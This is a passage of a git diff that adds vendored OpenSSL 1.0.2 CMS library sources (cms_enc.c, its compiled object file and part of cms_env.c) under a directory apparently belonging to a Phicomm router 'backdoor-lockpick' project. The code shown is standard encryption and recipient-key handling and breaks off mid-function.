+            CMSerr(CMS_F_CMS_ENCRYPTEDCONTENT_INIT_BIO, CMS_R_UNKNOWN_CIPHER);
+            goto err;
+        }
+    }
+
+    if (EVP_CipherInit_ex(ctx, ciph, NULL, NULL, NULL, enc) <= 0) {
+        CMSerr(CMS_F_CMS_ENCRYPTEDCONTENT_INIT_BIO,
+               CMS_R_CIPHER_INITIALISATION_ERROR);
+        goto err;
+    }
+
+    if (enc) {
+        int ivlen;
+        calg->algorithm = OBJ_nid2obj(EVP_CIPHER_CTX_type(ctx));
+        /* Generate a random IV if we need one */
+        ivlen = EVP_CIPHER_CTX_iv_length(ctx);
+        if (ivlen > 0) {
+            if (RAND_pseudo_bytes(iv, ivlen) <= 0)
+                goto err;
+            piv = iv;
+        }
+    } else if (EVP_CIPHER_asn1_to_param(ctx, calg->parameter) <= 0) {
+        CMSerr(CMS_F_CMS_ENCRYPTEDCONTENT_INIT_BIO,
+               CMS_R_CIPHER_PARAMETER_INITIALISATION_ERROR);
+        goto err;
+    }
+    tkeylen = EVP_CIPHER_CTX_key_length(ctx);
+    /* Generate random session key */
+    if (!enc || !ec->key) {
+        tkey = OPENSSL_malloc(tkeylen);
+        if (!tkey) {
+            CMSerr(CMS_F_CMS_ENCRYPTEDCONTENT_INIT_BIO, ERR_R_MALLOC_FAILURE);
+            goto err;
+        }
+        if (EVP_CIPHER_CTX_rand_key(ctx, tkey) <= 0)
+            goto err;
+    }
+
+    if (!ec->key) {
+        ec->key = tkey;
+        ec->keylen = tkeylen;
+        tkey = NULL;
+        if (enc)
+            keep_key = 1;
+        else
+            ERR_clear_error();
+
+    }
+
+    if (ec->keylen != tkeylen) {
+        /* If necessary set key length */
+        if (EVP_CIPHER_CTX_set_key_length(ctx, ec->keylen) <= 0) {
+            /*
+             * Only reveal failure if debugging so we don't leak information
+             * which may be useful in MMA.
+             */
+            if (enc || ec->debug) {
+                CMSerr(CMS_F_CMS_ENCRYPTEDCONTENT_INIT_BIO,
+                       CMS_R_INVALID_KEY_LENGTH);
+                goto err;
+            } else {
+                /* Use random key */
+                OPENSSL_cleanse(ec->key, ec->keylen);
+                OPENSSL_free(ec->key);
+                ec->key = tkey;
+                ec->keylen = tkeylen;
+                tkey = NULL;
+                ERR_clear_error();
+            }
+        }
+    }
+
+    if (EVP_CipherInit_ex(ctx, NULL, NULL, ec->key, piv, enc) <= 0) {
+        CMSerr(CMS_F_CMS_ENCRYPTEDCONTENT_INIT_BIO,
+               CMS_R_CIPHER_INITIALISATION_ERROR);
+        goto err;
+    }
+
+    if (piv) {
+        calg->parameter = ASN1_TYPE_new();
+        if (!calg->parameter) {
+            CMSerr(CMS_F_CMS_ENCRYPTEDCONTENT_INIT_BIO, ERR_R_MALLOC_FAILURE);
+            goto err;
+        }
+        if (EVP_CIPHER_param_to_asn1(ctx, calg->parameter) <= 0) {
+            CMSerr(CMS_F_CMS_ENCRYPTEDCONTENT_INIT_BIO,
+                   CMS_R_CIPHER_PARAMETER_INITIALISATION_ERROR);
+            goto err;
+        }
+    }
+    ok = 1;
+
+ err:
+    if (ec->key && !keep_key) {
+        OPENSSL_cleanse(ec->key, ec->keylen);
+        OPENSSL_free(ec->key);
+        ec->key = NULL;
+    }
+    if (tkey) {
+        OPENSSL_cleanse(tkey, tkeylen);
+        OPENSSL_free(tkey);
+    }
+    if (ok)
+        return b;
+    BIO_free(b);
+    return NULL;
+}
+
+int cms_EncryptedContent_init(CMS_EncryptedContentInfo *ec,
+                              const EVP_CIPHER *cipher,
+                              const unsigned char *key, size_t keylen)
+{
+    ec->cipher = cipher;
+    if (key) {
+        ec->key = OPENSSL_malloc(keylen);
+        if (!ec->key)
+            return 0;
+        memcpy(ec->key, key, keylen);
+    }
+    ec->keylen = keylen;
+    if (cipher)
+        ec->contentType = OBJ_nid2obj(NID_pkcs7_data);
+    return 1;
+}
+
+int CMS_EncryptedData_set1_key(CMS_ContentInfo *cms, const EVP_CIPHER *ciph,
+                               const unsigned char *key, size_t keylen)
+{
+    CMS_EncryptedContentInfo *ec;
+    if (!key || !keylen) {
+        CMSerr(CMS_F_CMS_ENCRYPTEDDATA_SET1_KEY, CMS_R_NO_KEY);
+        return 0;
+    }
+    if (ciph) {
+        cms->d.encryptedData = M_ASN1_new_of(CMS_EncryptedData);
+        if (!cms->d.encryptedData) {
+            CMSerr(CMS_F_CMS_ENCRYPTEDDATA_SET1_KEY, ERR_R_MALLOC_FAILURE);
+            return 0;
+        }
+        cms->contentType = OBJ_nid2obj(NID_pkcs7_encrypted);
+        cms->d.encryptedData->version = 0;
+    } else if (OBJ_obj2nid(cms->contentType) != NID_pkcs7_encrypted) {
+        CMSerr(CMS_F_CMS_ENCRYPTEDDATA_SET1_KEY, CMS_R_NOT_ENCRYPTED_DATA);
+        return 0;
+    }
+    ec = cms->d.encryptedData->encryptedContentInfo;
+    return cms_EncryptedContent_init(ec, ciph, key, keylen);
+}
+
+BIO *cms_EncryptedData_init_bio(CMS_ContentInfo *cms)
+{
+    CMS_EncryptedData *enc = cms->d.encryptedData;
+    if (enc->encryptedContentInfo->cipher && enc->unprotectedAttrs)
+        enc->version = 2;
+    return cms_EncryptedContent_init_bio(enc->encryptedContentInfo);
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/cms/cms_enc.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/cms/cms_enc.o
new file mode 100644
index 0000000000000000000000000000000000000000..0cd70ab6193418c5d069bd6d93435a77912cd2bd
GIT binary patch
literal 5528
zcmbW5Z)_Y#6~M<nJHGr|n}&i(L%N|?bWzFaHl@M|O5?q|jrU+<yS9@yEn#~;uj8xl
zA9r(&T}O4{bcvRWLxiZ*4@gL*Lgh;Ze2l8(q?B3_f+DMYKu8Fo3e_@h0wqzQfO&6r
z#vY$<CDbRaXZJVn-^`nt-SfO*ooH`sBSPB9<7DGWP(pg|+qmy%xBWyRyUB;$`~Rgs
zsh`$Q>0_rxP4{E7`d8DcpYOHm^T7$T-tll4v`se=>eCup<7Dk#_sb1<+V?&>G2KPp
zCPG28)~M_^K<m~u9r~`%z@Hlt_`_6|g8|U5UkC-YC3C?Fsn@?Py1*&D->lB5&_CTv
z2h7EIFZ7X>W6An)X1pFog!`ow><6IQ9PDSn5_K!I4<o89DG2L+z`WHO^E^+dh3Q8y
zeas5eiu2)laYY*FGwF7Dsl8omyf|VmWJ6)oz0Li1U-<=kakHVGmE+0!`Jjk<(3_vh
zO>wnV)@^9-8QMKVTV1Z9@nRy>18QC_Ou<UOZ@ITItsS7tCaf}j?IP+dJcg=F%XHb~
z9B5SuFk?E)su-l{zAa#_(S0R|94k@TZ@SZ}<xYnoUS&J8(pFc3+N%C0=s;HGuyy1E
zdXh~Q>xOAPj>_Arb5TOOz4*_A?lM*g4b1wS>gBk813|P^48!@?RaQ1_NxNs&VFot2
z-{twls;$J$>IIk}{W@ktPc!qRI}n5c;o9J;I;!?=a`H&45-{_X-RmWQp$4EBn6Oz}
zqYoOj_bPjF2u<lP##M+w%-Sm51Le2)3KJ{Afa%zS(Y*zLH4QR-7+T+i`KY(MXealI
zo2dGh`OI1U8~R!Oo4S3IZBN*oN%t=7Pt*MmY|&qt?)hG`wnPsl-FJEA-FG0{YkvUW
zo-5aYyc-mj<f7&N#dLrF;cKRQHtfyTNyt{YalfQYo=LcOcvLSYI}Y?GFibG%{@SeF
z5>xseuv>W+PYU-gCIHLvtLDNn92SoqXGeit0qw@#jqZS12aQEEAS+RmZ}I9!d+9@7
zX<mSi>vQmD<Meo1Yk0GA6OAo**>e93+u5wo1ofx9p5@>EcWn*l%dEpHfDW@d-%F@s
zR%dz$?Sg>q;BtBA$7^fpT-kQ==}4N8fq49=8a_2%$<vB@B=Tq^dPw_9g*|F79*#z$
zUq0wzutn*B3%6w_Tmyrr&}Rb~9BxcL&D*vYMo8OCPul~#x`J16Qvu({`+kJVCzPJ=
zwa1j+D}k7zE_B3{@a0ZjiC)~MD}B|j0p+E(z<faI1EecqPyyAL(i2mHg!F;=6!%53
z1z%Ut*FwNh)XN=UaIrI?M627{pH#w$O}3cFYuxrtZo7cCmjk+@UPRk!XH1E<yE~L{
zTv2rqR^K_Qgh6E;c=K?F`}!hp{Tke*9prCot@;Bk-&i=OVpca>1y~g}GkglLs<h%=
zTOrej$!sA3vV9BP$p}_`s|3ilEfCkpebTsC&4J<jkR9ty76~8zgbzRC!_WEfq7T2|
z!!P;pANue&eE3^F{9PaZCm;S#AHEY7R;&38`S8bmxaGqqd^q*t-}m9K`tUb=IKE_C
zjq7(l{Et5THgH^rV*Ro60_Ji%99+ov;Nb<r&H`vdz+1&V;=>2HpLe*Q^>bk3jEz|F
zD8WY~pDxW7sWTBT<f)UVb|#;p_IRd1>;Y>ird#&Vi4&v7m_4S)EW;+T<d8jSr!&PV
zr^Fue&Us>tjM&8rwVhI_;L$WKWyw(NYj$D$xx@L)1iOd!a5+zm)5G>ThjJ(5v-woc
zVKC0TCNTkL#v{pL(-^ViV^4{YXdL$_oh>@+ej!e?Mdo=s>*UYTDKerDChTI_sZ12?
z@mcDWWz|$Uui3O<7gMEFPVT^{)6T4L5+6A;JT_$KQrT=F-K<wi<tI>?O+`BEq)L1;
zq<qm|8OAO792zzTM@KCiE%IfD@EDUN$07RYpk|Mq88&P-#T(;hiDJf>xmOU>x9u`b
zrKj!m)U-XB%4Ge^OX4R-HwvFf(G=#TvHZ7oWvG`*hB`Tx%BE$*tk>5JTejq=*RVIj
zZn*#VnkO-dD-y?VM-*JH-Eay0m*5@+Ij(=fUquLl{8MlV{!@e?$nmF@;6FzQf_x8L
zf-fNiK`zI=!>Gsc+d=5>hJB0Dtbah__ys5Q4@&$q5|2v!vl2fhas06*{0vL{a}uAD
zIDX3s{Yw&;$Mw3zACUBKaSq1@d&>$xzmfF!N&0`6xa_|R9f08cd>$_0CoJ*(63252
z1@#|<OX!y*u1b7P;s+%DU5U&7e<E?Yj<+QK1<B8f#2=D4{z^t^uDd3275YW~M<p)j
zIU;dc|7nTK`WcCbB>$Hr{;<Sva*o5muO*SslB6%!aZTd#I!xj~LC{YaF5zd8b8HSu
zJSTD4Pfg<TKK-%8<@KY2PZW&HOTnJA?C%B_@6FenxOi{=qlt_6Ac>S`b2K#$EiHNN
zl(;K7*;Ir&Gn7Oo;6Nmi@p73&N(FpCbuFTiNV<^A!8?*f@&)Qd;HSnRcI5KsbNNc7
zSSl2q5}gH8bm&aklkip%2OQ7qlQt?C;?`^avh4?ka+lAm_vGn{du(yfqe?$qn*<MO
zkUnmY-_;mLe2KGv{J=AQM<D0R2JSq0to0{2(-k_{ehDu0`AO|Hu*LX?;gUtf-yuV|
zM_m-r_VfEFLP?JE{2!4R-U>U>CM71TKKFl)AAcX<uO4}Aqn{$TSMfm-G5-R63vMu%
zX8WrmzDSfCG~44oYE}O}+?*iKvcH62{qg(|_M-l+Vx!4bz955q{p<pUKAP>(XLIcV
bkym)(#+wG#G#vJ>Z)wl-$A3@A(ro`fo_Tpo

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/cms/cms_env.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/cms/cms_env.c
new file mode 100644
index 0000000..93c06cb
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/cms/cms_env.c
@@ -0,0 +1,974 @@
+/* crypto/cms/cms_env.c */
+/*
+ * Written by Dr Stephen N Henson (steve@openssl.org) for the OpenSSL
+ * project.
+ */
+/* ====================================================================
+ * Copyright (c) 2008 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    licensing@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ */
+
+#include "cryptlib.h"
+#include <openssl/asn1t.h>
+#include <openssl/pem.h>
+#include <openssl/x509v3.h>
+#include <openssl/err.h>
+#include <openssl/cms.h>
+#include <openssl/rand.h>
+#include <openssl/aes.h>
+#include "cms_lcl.h"
+#include "asn1_locl.h"
+
+/* CMS EnvelopedData Utilities */
+
+DECLARE_ASN1_ITEM(CMS_EnvelopedData)
+DECLARE_ASN1_ITEM(CMS_KeyTransRecipientInfo)
+DECLARE_ASN1_ITEM(CMS_KEKRecipientInfo)
+DECLARE_ASN1_ITEM(CMS_OtherKeyAttribute)
+
+DECLARE_STACK_OF(CMS_RecipientInfo)
+
+CMS_EnvelopedData *cms_get0_enveloped(CMS_ContentInfo *cms)
+{
+    if (OBJ_obj2nid(cms->contentType) != NID_pkcs7_enveloped) {
+        CMSerr(CMS_F_CMS_GET0_ENVELOPED,
+               CMS_R_CONTENT_TYPE_NOT_ENVELOPED_DATA);
+        return NULL;
+    }
+    return cms->d.envelopedData;
+}
+
+static CMS_EnvelopedData *cms_enveloped_data_init(CMS_ContentInfo *cms)
+{
+    if (cms->d.other == NULL) {
+        cms->d.envelopedData = M_ASN1_new_of(CMS_EnvelopedData);
+        if (!cms->d.envelopedData) {
+            CMSerr(CMS_F_CMS_ENVELOPED_DATA_INIT, ERR_R_MALLOC_FAILURE);
+            return NULL;
+        }
+        cms->d.envelopedData->version = 0;
+        cms->d.envelopedData->encryptedContentInfo->contentType =
+            OBJ_nid2obj(NID_pkcs7_data);
+        ASN1_OBJECT_free(cms->contentType);
+        cms->contentType = OBJ_nid2obj(NID_pkcs7_enveloped);
+        return cms->d.envelopedData;
+    }
+    return cms_get0_enveloped(cms);
+}
+
+int cms_env_asn1_ctrl(CMS_RecipientInfo *ri, int cmd)
+{
+    EVP_PKEY *pkey;
+    int i;
+    if (ri->type == CMS_RECIPINFO_TRANS)
+        pkey = ri->d.ktri->pkey;
+    else if (ri->type == CMS_RECIPINFO_AGREE) {
+        EVP_PKEY_CTX *pctx = ri->d.kari->pctx;
+        if (!pctx)
+            return 0;
+        pkey = EVP_PKEY_CTX_get0_pkey(pctx);
+        if (!pkey)
+            return 0;
+    } else
+        return 0;
+    if (!pkey->ameth || !pkey->ameth->pkey_ctrl)
+        return 1;
+    i = pkey->ameth->pkey_ctrl(pkey, ASN1_PKEY_CTRL_CMS_ENVELOPE, cmd, ri);
+    if (i == -2) {
+        CMSerr(CMS_F_CMS_ENV_ASN1_CTRL,
+               CMS_R_NOT_SUPPORTED_FOR_THIS_KEY_TYPE);
+        return 0;
+    }
+    if (i <= 0) {
+        CMSerr(CMS_F_CMS_ENV_ASN1_CTRL, CMS_R_CTRL_FAILURE);
+        return 0;
+    }
+    return 1;
+}
+
+STACK_OF(CMS_RecipientInfo) *CMS_get0_RecipientInfos(CMS_ContentInfo *cms)
+{
+    CMS_EnvelopedData *env;
+    env = cms_get0_enveloped(cms);
+    if (!env)
+        return NULL;
+    return env->recipientInfos;
+}
+
+int CMS_RecipientInfo_type(CMS_RecipientInfo *ri)
+{
+    return ri->type;
+}
+
+EVP_PKEY_CTX *CMS_RecipientInfo_get0_pkey_ctx(CMS_RecipientInfo *ri)
+{
+    if (ri->type == CMS_RECIPINFO_TRANS)
+        return ri->d.ktri->pctx;
+    else if (ri->type == CMS_RECIPINFO_AGREE)
+        return ri->d.kari->pctx;
+    return NULL;
+}
+
+CMS_ContentInfo *CMS_EnvelopedData_create(const EVP_CIPHER *cipher)
+{
+    CMS_ContentInfo *cms;
+    CMS_EnvelopedData *env;
+    cms = CMS_ContentInfo_new();
+    if (!cms)
+        goto merr;
+    env = cms_enveloped_data_init(cms);
+    if (!env)
+        goto merr;
+    if (!cms_EncryptedContent_init(env->encryptedContentInfo,
+                                   cipher, NULL, 0))
+        goto merr;
+    return cms;
+ merr:
+    if (cms)
+        CMS_ContentInfo_free(cms);
+    CMSerr(CMS_F_CMS_ENVELOPEDDATA_CREATE, ERR_R_MALLOC_FAILURE);
+    return NULL;
+}
+
+/* Key Transport Recipient Info (KTRI) routines */
+
+/* Initialise a ktri based on passed certificate and key */
+
+static int cms_RecipientInfo_ktri_init(CMS_RecipientInfo *ri, X509 *recip,
+                                       EVP_PKEY *pk, unsigned int flags)
+{
+    CMS_KeyTransRecipientInfo *ktri;
+    int idtype;
+
+    ri->d.ktri = M_ASN1_new_of(CMS_KeyTransRecipientInfo);
+    if (!ri->d.ktri)
+        return 0;
+    ri->type = CMS_RECIPINFO_TRANS;
+
+    ktri = ri->d.ktri;
+
+    if (flags & CMS_USE_KEYID) {
+        ktri->version = 2;
+        idtype = CMS_RECIPINFO_KEYIDENTIFIER;
+    } else {
+        ktri->version = 0;
+        idtype = CMS_RECIPINFO_ISSUER_SERIAL;
+    }
+
+    /*
+     * Not a typo: RecipientIdentifier and SignerIdentifier are the same
+     * structure.
+     */
+
+    if (!cms_set1_SignerIdentifier(ktri->rid, recip, idtype))
+        return 0;
+
+    CRYPTO_add(&recip->references, 1, CRYPTO_LOCK_X509);
+    CRYPTO_add(&pk->references, 1, CRYPTO_LOCK_EVP_PKEY);
+    ktri->pkey = pk;
+    ktri->recip = recip;
+
+    if (flags & CMS_KEY_PARAM) {
+        ktri->pctx = EVP_PKEY_CTX_new(ktri->pkey, NULL);
+        if (!ktri->pctx)
+            return 0;
+        if (EVP_PKEY_encrypt_init(ktri->pctx) <= 0)
+            return 0;
+    } else if (!cms_env_asn1_ctrl(ri, 0))
+        return 0;
+    return 1;
+}
+
+/*
+ * Add a recipient certificate using appropriate type of RecipientInfo
+ */
+
+CMS_RecipientInfo *CMS_add1_recipient_cert(CMS_ContentInfo *cms,
+                                           X509 *recip, unsigned int flags)
+{
+    CMS_RecipientInfo *ri = NULL;
+    CMS_EnvelopedData *env;
+    EVP_PKEY *pk = NULL;
+    env = cms_get0_enveloped(cms);
+    if (!env)
+        goto err;
+
+    /* Initialize recipient info */
+    ri = M_ASN1_new_of(CMS_RecipientInfo);
+    if (!ri)
+        goto merr;
+
+    pk = X509_get_pubkey(recip);
+    if (!pk) {
+        CMSerr(CMS_F_CMS_ADD1_RECIPIENT_CERT, CMS_R_ERROR_GETTING_PUBLIC_KEY);
+        goto err;
+    }
+
+    switch (cms_pkey_get_ri_type(pk)) {
+
+    case CMS_RECIPINFO_TRANS:
+        if (!cms_RecipientInfo_ktri_init(ri, recip, pk, flags))
+            goto err;
+        break;
+
+    case CMS_RECIPINFO_AGREE:
+        if (!cms_RecipientInfo_kari_init(ri, recip, pk, flags))
+            goto err;
+        break;
+
+    default:
+        CMSerr(CMS_F_CMS_ADD1_RECIPIENT_CERT,
+               CMS_R_NOT_SUPPORTED_FOR_THIS_KEY_TYPE);
+        goto err;
+
+    }
+
+    if (!sk_CMS_RecipientInfo_push(env->recipientInfos, ri))
+        goto merr;
+
+    EVP_PKEY_free(pk);
+
+    return ri;
+
+ merr:
+    CMSerr(CMS_F_CMS_ADD1_RECIPIENT_CERT, ERR_R_MALLOC_FAILURE);
+ err:
+    if (ri)
+        M_ASN1_free_of(ri, CMS_RecipientInfo);
+    if (pk)
+        EVP_PKEY_free(pk);
+    return NULL;
+
+}
+
+int CMS_RecipientInfo_ktri_get0_algs(CMS_RecipientInfo *ri,
+                                     EVP_PKEY **pk, X509 **recip,
+                                     X509_ALGOR **palg)
+{
+    CMS_KeyTransRecipientInfo *ktri;
+    if (ri->type != CMS_RECIPINFO_TRANS) {
+        CMSerr(CMS_F_CMS_RECIPIENTINFO_KTRI_GET0_ALGS,
+               CMS_R_NOT_KEY_TRANSPORT);
+        return 0;
+    }
+
+    ktri = ri->d.ktri;
+
+    if (pk)
+        *pk = ktri->pkey;
+    if (recip)
+        *recip = ktri->recip;
+    if (palg)
+        *palg = ktri->keyEncryptionAlgorithm;
+    return 1;
+}
+
+int CMS_RecipientInfo_ktri_get0_signer_id(CMS_RecipientInfo *ri,
+                                          ASN1_OCTET_STRING **keyid,
+                                          X509_NAME **issuer,
+                                          ASN1_INTEGER **sno)
+{
+    CMS_KeyTransRecipientInfo *ktri;
+    if (ri->type != CMS_RECIPINFO_TRANS) {
+        CMSerr(CMS_F_CMS_RECIPIENTINFO_KTRI_GET0_SIGNER_ID,
+               CMS_R_NOT_KEY_TRANSPORT);
+        return 0;
+    }
+    ktri = ri->d.ktri;
+
+    return cms_SignerIdentifier_get0_signer_id(ktri->rid, keyid, issuer, sno);
+}
+
+int CMS_RecipientInfo_ktri_cert_cmp(CMS_RecipientInfo *ri, X509 *cert)
+{
+    if (ri->type != CMS_RECIPINFO_TRANS) {
+        CMSerr(CMS_F_CMS_RECIPIENTINFO_KTRI_CERT_CMP,
+               CMS_R_NOT_KEY_TRANSPORT);
+        return -2;
+    }
+    return cms_SignerIdentifier_cert_cmp(ri->d.ktri->rid, cert);
+}
+
+int CMS_RecipientInfo_set0_pkey(CMS_RecipientInfo *ri, EVP_PKEY *pkey)
+{
+    if (ri->type != CMS_RECIPINFO_TRANS) {
+        CMSerr(CMS_F_CMS_RECIPIENTINFO_SET0_PKEY, CMS_R_NOT_KEY_TRANSPORT);
+        return 0;
+    }
+    ri->d.ktri->pkey = pkey;
+    return 1;
+}
+
+/* Encrypt content key in key transport recipient info */
+
+static int cms_RecipientInfo_ktri_encrypt(CMS_ContentInfo *cms,
+                                          CMS_RecipientInfo *ri)
+{
+    CMS_KeyTransRecipientInfo *ktri;
+    CMS_EncryptedContentInfo *ec;
+    EVP_PKEY_CTX *pctx;
+    unsigned char *ek = NULL;
+    size_t eklen;
+
+    int ret = 0;
+
+    if (ri->type != CMS_RECIPINFO_TRANS) {
+        CMSerr(CMS_F_CMS_RECIPIENTINFO_KTRI_ENCRYPT, CMS_R_NOT_KEY_TRANSPORT);
+        return 0;
+    }
+    ktri = ri->d.ktri;
+    ec = cms->d.envelopedData->encryptedContentInfo;
+
+    pctx = ktri->pctx;
+
+    if (pctx) {
+        if (!cms_env_asn1_ctrl(ri, 0))
+            goto err;
+    } else {
+        pctx = EVP_PKEY_CTX_new(ktri->pkey, NULL);
+        if (!pctx)
+            return 0;
+
+        if (EVP_PKEY_encrypt_init(pctx) <= 0)
+            goto err;
+    }
+
+    if (EVP_PKEY_CTX_ctrl(pctx, -1, EVP_PKEY_OP_ENCRYPT,
+                          EVP_PKEY_CTRL_CMS_ENCRYPT, 0, ri) <= 0) {
+        CMSerr(CMS_F_CMS_RECIPIENTINFO_KTRI_ENCRYPT, CMS_R_CTRL_ERROR);
+        goto err;
+    }
+
+    if (EVP_PKEY_encrypt(pctx, NULL, &eklen, ec->key, ec->keylen) <= 0)
+        goto err;
+
+    ek = OPENSSL_malloc(eklen);
+
+    if (ek == NULL) {
+        CMSerr(CMS_F_CMS_RECIPIENTINFO_KTRI_ENCRYPT, ERR_R_MALLOC_FAILURE);
+        goto err;
+    }
+
+    if (EVP_PKEY_encrypt(pctx, ek, &eklen, ec->key, ec->keylen) <= 0)
+        goto err;
+
+    ASN1_STRING_set0(ktri->encryptedKey, ek, eklen);
+    ek = NULL;
+
+    ret = 1;
+
+ err:
+    if (pctx) {
+        EVP_PKEY_CTX_free(pctx);
+        ktri->pctx = NULL;
+    }
+    if (ek)
+        OPENSSL_free(ek);
+    return ret;
+
+}
+
+/* Decrypt content key from KTRI */
+
+static int cms_RecipientInfo_ktri_decrypt(CMS_ContentInfo *cms,
+                                          CMS_RecipientInfo *ri)
+{
+    CMS_KeyTransRecipientInfo *ktri = ri->d.ktri;
+    EVP_PKEY *pkey = ktri->pkey;
+    unsigned char *ek = NULL;
+    size_t eklen;
+    int ret = 0;
+    CMS_EncryptedContentInfo *ec;
+    ec = cms->d.envelopedData->encryptedContentInfo;
+
+    if (ktri->pkey == NULL) {
+        CMSerr(CMS_F_CMS_RECIPIENTINFO_KTRI_DECRYPT, CMS_R_NO_PRIVATE_KEY);
+        return 0;
+    }
+
+    ktri->pctx = EVP_PKEY_CTX_new(pkey, NULL);
+    if (!ktri->pctx)
+        return 0;
+
+    if (EVP_PKEY_decrypt_init(ktri->pctx) <= 0)
+        goto err;
+
+    if (!cms_env_asn1_ctrl(ri, 1))
+        goto err;
+
+    if (EVP_PKEY_CTX_ctrl(ktri->pctx, -1, EVP_PKEY_OP_DECRYPT,
+                          EVP_PKEY_CTRL_CMS_DECRYPT, 0, ri) <= 0) {
+        CMSerr(CMS_F_CMS_RECIPIENTINFO_KTRI_DECRYPT, CMS_R_CTRL_ERROR);
+        goto err;
+    }
+
+    if (EVP_PKEY_decrypt(ktri->pctx, NULL, &eklen,
+                         ktri->encryptedKey->data,
+                         ktri->encryptedKey->length) <= 0)
+        goto err;
+
+    ek = OPENSSL_malloc(eklen);
+
+    if (ek == NULL) {
+        CMSerr(CMS_F_CMS_RECIPIENTINFO_KTRI_DECRYPT, ERR_R_MALLOC_FAILURE);
+        goto err;
+    }
+
+    if (EVP_PKEY_decrypt(ktri->pctx, ek, &eklen,
+                         ktri->encryptedKey->data,
+                         ktri->encryptedKey->length) <= 0) {
+        CMSerr(CMS_F_CMS_RECIPIENTINFO_KTRI_DECRYPT, CMS_R_CMS_LIB);
+        goto err;
+    }
+
+    ret = 1;
+
+    if (ec->key) {
+        OPENSSL_cleanse(ec->key, ec->keylen);
+        OPENSSL_free(ec->key);
+    }
+
+    ec->key = ek;
+    ec->keylen = eklen;
+
+ err:
+    if (ktri->pctx) {
+        EVP_PKEY_CTX_free(ktri->pctx);
+        ktri->pctx = NULL;
+    }
+    if (!ret && ek)
+        OPENSSL_free(ek);
+
+    return ret;
+}
+
+/* Key Encrypted Key (KEK) RecipientInfo routines */
+
+int CMS_RecipientInfo_kekri_id_cmp(CMS_RecipientInfo *ri,
+                                   const unsigned char *id, size_t idlen)
+{
+    ASN1_OCTET_STRING tmp_os;
+    CMS_KEKRecipientInfo *kekri;
+    if (ri->type != CMS_RECIPINFO_KEK) {
+        CMSerr(CMS_F_CMS_RECIPIENTINFO_KEKRI_ID_CMP, CMS_R_NOT_KEK);
+        return -2;
+    }
+    kekri = ri->d.kekri;
+    tmp_os.type = V_ASN1_OCTET_STRING;
+    tmp_os.flags = 0;
+    tmp_os.data = (unsigned char *)id;
+    tmp_os.length = (int)idlen;
+    return ASN1_OCTET_STRING_cmp(&tmp_os, kekri->kekid->keyIdentifier);
+}
+
+/* For now hard code AES key wrap info */
+
+static size_t aes_wrap_keylen(int nid)
+{
+    switch (nid) {
+    case NID_id_aes128_wrap:
+        return 16;
+
+    case NID_id_aes192_wrap:
+        return 24;
+
+    case NID_id_aes256_wrap:
+        return 32;
+
+    default:
+        return 0;
+    }
+}
+
+CMS_RecipientInfo *CMS_add0_recipient_key(CMS_ContentInfo *cms, int nid,
+                                          unsigned char *key, size_t keylen,
+                                          unsigned char *id, size_t idlen,
+                                          ASN1_GENERALIZEDTIME *date,
+                                          ASN1_OBJECT *otherTypeId,
+                                          ASN1_TYPE *otherType)
+{
+    CMS_RecipientInfo *ri = NULL;
+    CMS_EnvelopedData *env;
+    CMS_KEKRecipientInfo *kekri;
+    env = cms_get0_enveloped(cms);
+    if (!env)
+        goto err;
+
+    if (nid == NID_undef) {
+        switch (keylen) {
+        case 16:
+            nid = NID_id_aes128_wrap;
+            break;
+
+        case 24:
+            nid = NID_id_aes192_wrap;
+            break;
+
+        case 32:
+            nid = NID_id_aes256_wrap;
+            break;
+
+        default:
+            CMSerr(CMS_F_CMS_ADD0_RECIPIENT_KEY, CMS_R_INVALID_KEY_LENGTH);
+            goto err;
+        }
+
+    } else {
+
+        size_t exp_keylen = aes_wrap_keylen(nid);
+
+        if (!exp_keylen) {
+            CMSerr(CMS_F_CMS_ADD0_RECIPIENT_KEY,
+                   CMS_R_UNSUPPORTED_KEK_ALGORITHM);
+            goto err;
+        }
+
+        if (keylen != exp_keylen) {
